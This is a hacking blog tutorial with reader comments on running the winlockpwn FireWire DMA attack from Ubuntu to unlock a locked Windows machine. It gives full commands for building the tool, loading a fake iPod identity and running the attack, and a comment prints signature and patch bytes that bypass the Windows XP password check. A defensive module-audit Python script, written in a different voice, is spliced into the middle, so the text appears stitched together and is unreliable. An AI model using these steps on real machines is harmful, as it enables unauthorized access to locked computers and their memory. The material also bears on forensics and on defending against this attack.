Posted by & filed under Hacking & Pentesting, Hacks, Tools & Methodology.

Update: I’ve released a tool at github called Inception, which uses libforensic1394 to unlock Windows XP, Vista and Windows 7 boxes. IMNSHO, it is much more stable than winlockpwn, easier to use and works against a wider spectrum of target operating systems.

Quite regularly I’m being asked to demonstrate the FireWire attack made by MetlStorm aka Adam Boileau (http://www.storm.net.nz/projects/16 [site down as of May 20]), where an attacker unlocks a Windows machine by writing to the victim machine’s memory via FireWire. It’s kind of a party trick hack, but it never ceases to amaze people. A couple of days ago I demonstrated the trick at AFSecurity, and I was asked if it was easy to find a good description of how to do it.

Well, sort of. There’s an excellent guide here, but several of the commands do not work out of the box on Ubuntu anymore, so I’ve created this little tutorial. All hail to Tim for creating the original. Also, the original source of the tool has disappeared from the net, so I’ve started hosting my own version of the tool right here. Metlstorm, if you read this, apologies in advance. Let me buy you a beer sometime! Or get your site up again :-)

So here’s how to do the hack on Ubuntu 11.04 (Natty Narwhal) Ubuntu 10.10 (Maverick Meerkat):

(Update: According to this thread, the raw1394 device is no longer supported as of Ubuntu 11.04, I’ll try to figure out how to use the tool with the new FireWire stack (JuJu)).

Get the dependencies

First, get the stuff we need to be able to compile the winlockpwn tool and necessary FireWire driver:

sudo apt-get install build-essential linux-headers-$(uname -r) libdc1394-22 libraw1394-dev swig

Secondly, we need to download and compile Python 2.3:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvfz Python-2.3.6.tgz
cd Python-2.3.6
./configure

Now, since this old Python version has several potential buffer overflow vulnerabilities, we have to tell gcc to stop guarding against them (disable the stack protector and the FORTIFY_SOURCE checks, otherwise the build fails) by editing the Makefile. Open the Makefile in your favourite text editor, and change the following line:

BASECFLAGS=      -fno-strict-aliasing

To:

BASECFLAGS=      -fno-strict-aliasing -fno-stack-protector -U_FORTIFY_SOURCE

Then compile and do an alternative install (altinstall lets the new (old) Python co-reside nicely with your existing Python libraries instead of replacing them):

make
sudo make altinstall

Fix up the libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

Search for and comment out all references to ‘__attribute__ ((deprecated));’, making sure to put a terminating semicolon on the previous line.

Download and install winlockpwn

Since Adam Boileau’s site is down, I’ve taken the liberty of hosting the tool files here. I’ve also added some more csr’s and signatures for Windows XP SP3, Vista 32- and 64-bit, Ubuntu 9.04 and Windows 7 32- and 64-bit. Woohoo!

wget http://www.breaknenter.org/files/winlockpwn/pythonraw1394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget http://www.breaknenter.org/files/winlockpwn/winlockpwn
chmod +x ./winlockpwn
vim Makefile (reference /usr/local/bin/python2.3 instead of /usr for python)
make

Unload the default Ubuntu FireWire drivers and load your own:

sudo modprobe -r firewire_ohci
sudo modprobe -r firewire_core
sudo modprobe ohci1394
sudo modprobe raw1394

Give write permissions to the firewire device:

sudo chmod 666 /dev/raw1394

Edit the first line (the interpreter path) of the files romtool, businfo and winlockpwn to reference the Python 2.3 location installed above, then load the iPod image (or any of the other csr’s) onto the FireWire port:

sudo ./romtool -s 0 ipod.csr

Run businfo to check the port configurations:

sudo ./businfo

Check the node list. Node 0 is the Windows machine, node 1 should be the fake iPod. Connect to the Windows machine using a FireWire cable, and watch as Windows loads the FireWire drivers, recognizes the iPod and gives it DMA. Finally, run winlockpwn (example parameters below):

sudo ./winlockpwn 0 0 2

You can get a quick explanation of the winlockpwn parameters by running the command without parameters. If you’re having trouble getting DMA access, try some of the other ROM csr’s. Also, verify that no FireWire drivers other than the ones loaded above are present by issuing the following commands:

lsmod | grep 1394
lsmod | grep firewire
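As an added defensive counterpart to the module checks above (my own example, not code from the original post or from winlockpwn), the script below audits whether a Linux host can still load the FireWire modules this attack depends on, and flags modprobe.d rules that merely blacklist a module instead of hard-blocking it. The lsmod and modprobe.d text it parses is constructed sample input, not taken from a real host.

```python
"""Audit a Linux host for the FireWire DMA exposure described above.  The attack needs
a FireWire host driver on the target.  Caveat: 'blacklist' only stops alias-based
autoloading; 'install <mod> /bin/false' (or /bin/true) also defeats an explicit modprobe."""
import re

# Kernel modules that expose the 1394 bus to DMA from an attached node (both stacks).
FIREWIRE_MODULES = {"firewire_ohci", "firewire_core", "firewire_sbp2",                # JuJu
                    "ohci1394", "ieee1394", "raw1394", "sbp2", "dv1394", "video1394"}  # old
_RULE_RE = re.compile(r"^\s*(blacklist|install)\s+(\S+)(?:\s+(.*?))?\s*$")

def _norm(name):  # modprobe treats '-' and '_' alike; lsmod always prints '_'
    return name.replace("-", "_")

def loaded_firewire_modules(lsmod_text):
    """FireWire-related modules in `lsmod` output (first column, header skipped)."""
    names = {ln.split()[0] for ln in lsmod_text.splitlines()[1:] if ln.split()}
    return {_norm(n) for n in names} & FIREWIRE_MODULES

def firewire_module_rules(modprobe_conf_text):
    """Map FireWire module -> 'install' (hard block) or 'blacklist' (autoload only)."""
    rules = {}
    for line in modprobe_conf_text.splitlines():
        m = _RULE_RE.match(line.split("#", 1)[0])
        if not m or _norm(m.group(2)) not in FIREWIRE_MODULES:
            continue
        kind, mod, cmd = m.group(1), _norm(m.group(2)), (m.group(3) or "").strip()
        if kind == "install" and cmd in ("/bin/false", "/bin/true"):
            rules[mod] = "install"              # the real module can never load
        elif kind == "blacklist":
            rules.setdefault(mod, "blacklist")  # an explicit modprobe still works
    return rules

def audit(lsmod_text, modprobe_conf_text):
    """Report what is loaded now and which FireWire modules could still be loaded."""
    loaded = loaded_firewire_modules(lsmod_text)
    rules = firewire_module_rules(modprobe_conf_text)
    hard = {m for m, k in rules.items() if k == "install"}
    return {"loaded": sorted(loaded), "hard_blocked": sorted(hard),
            "blacklist_only": sorted(m for m, k in rules.items() if k == "blacklist"),
            "loadable_on_demand": sorted(FIREWIRE_MODULES - hard - loaded)}

# Constructed sample input (not from a real host): lsmod after the page's modprobe steps.
SAMPLE_LSMOD = """Module                  Size  Used by
raw1394                28000  0
ohci1394               30000  0
ieee1394               90000  2 raw1394,ohci1394
"""
SAMPLE_CONF = ("blacklist firewire-ohci   # weak: stops autoload only\n"
               "install firewire-core /bin/false\ninstall sbp2 /bin/true\n")
```

On a live host, feed audit() the output of lsmod and the concatenated contents of /etc/modprobe.d/*.conf; anything listed under loadable_on_demand or blacklist_only can still be brought up by an explicit modprobe.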

14 Responses to “winlockpwn on Ubuntu”

  1. nino

    Hi Carsten

    I’ve just updated to 11.04 and I’m having issues getting the raw1394 module to load:

    sudo modprobe raw1394
    FATAL: Module raw1394 not found.

    raw1394 is definitely installed:

    sudo apt-get install libraw1394-dev
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    libraw1394-dev is already the newest version.
    0 upgraded, 0 newly installed, 0 to remove and 174 not upgraded.

    I’d appreciate it if you could give me some pointers!

    • Carsten

      Did you issue the modprobe command from the directory where you compiled winlockpwn? You should have a ‘raw1394.ko’ kernel module there if I’m not mistaken, but I’ll check when I have access to my Ubuntu box.

      • nino

        Hi Carsten

        I only have:
        raw1394.i
        raw1394.pyc
        raw1394_wrap.c

        There isn’t a raw1394.ko anywhere on the system; apparently the support has been removed from the later kernels.

        I’m giving a demo tomorrow so I might need to format and go back down to 9.10 :(

        • Carsten

          Haven’t tried the tool on the newest ubuntu release yet (there was a typo in the guide stating that it was for Natty, while I’ve only tested this on Ubuntu 10.10 (Maverick Meerkat)), so unfortunately I’m unable to help you. But I’ll check today if I can make it work on Natty as well.

          I’m currently developing my own tool that is much more stable, although it’s unfinished. It’s available at github in a pre-alpha release: https://github.com/carmaa/FTWAutopwn

          It only includes signatures for Win7 at the moment, but you can copy other signatures from the winlockpwn tool.

          It requires python3.2 and libforensic1394, check the readme file.

      • Vishal

        Hello Carsten,

        I am working on my research project on the Forensic Firewire topic but when I run the following command as:

        sudo modprobe ohci1394
        sudo modprobe raw1394

        It gives me error as “Module raw1394 not found”.

        Can you please help me out with what my mistake is?

        Thanks..

          • Vishal

            Hello Carsten,

            As per your suggestion I used the “ftwautopwn” tools and the procedure suggested by you, but after the complete attack I get an output as “Attack Unsuccessful” as no signature was found. I tried this on Mac Book Pro (Snow Leopard 10.6.8) and even on Windows 7 SP1 Home Edition.

            Can you please help me for the same. Because I am stuck on the same. Actually my main task is to capture the RAM memory (volatile memory) but I am unsuccessful. Can you please help me I will be very thankful to you.

            Please reply ASAP.

            Thanks

    • Carsten

      Tried winlockpwn on Natty last night, didn’t pan out. Seems like the new FW stack doesn’t include raw1394 anymore. Let me do some digging to see if it’s possible to fetch the old stack from somewhere and load it.

  2. firedart

    I’m having trouble getting FTWautopwn to work on BackTrack 5. Could you possibly provide step-by-step instructions for getting it working from a fresh install of Backtrack5 please? Including how to install Python 3.2.1 and libforensic1394 to the right place, where to put ftwautopwn.py, what other files I need from your github page etc. My linux skills are poor!

  3. jan

    I am having trouble getting this to work. The SBP2 device shows up in the device manager of the target machine, as well as a disk drive (UNKNOWN VENDOR AND MODEL) with a yellow question mark on it. It says ‘cannot start’. The error I get is:

    Please select target (or enter 'q' to quit): 6
    [+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
    Phase 1:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x8aa (2218)
    Phase 2:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x862 (2146)
    Traceback (most recent call last):SBP2, please wait 1 seconds or press Ctrl+C
    File "./ftwautopwn.py", line 80, in
    main(sys.argv[1:])
    File "./ftwautopwn.py", line 76, in main
    unlock.run(ctx)
    File "/home/jan/FTWAutopwn/ftwautopwn/unlock.py", line 129, in run
    d = initialize_fw(d)
    File "/home/jan/FTWAutopwn/ftwautopwn/unlock.py", line 254, in initialize_fw
    d = b.devices()[0]
    IndexError: list index out of range

    any ideas?


Trackbacks/Pingbacks

  1.  Alternative to winlockpwn: libforensic1394 | Break & Enter
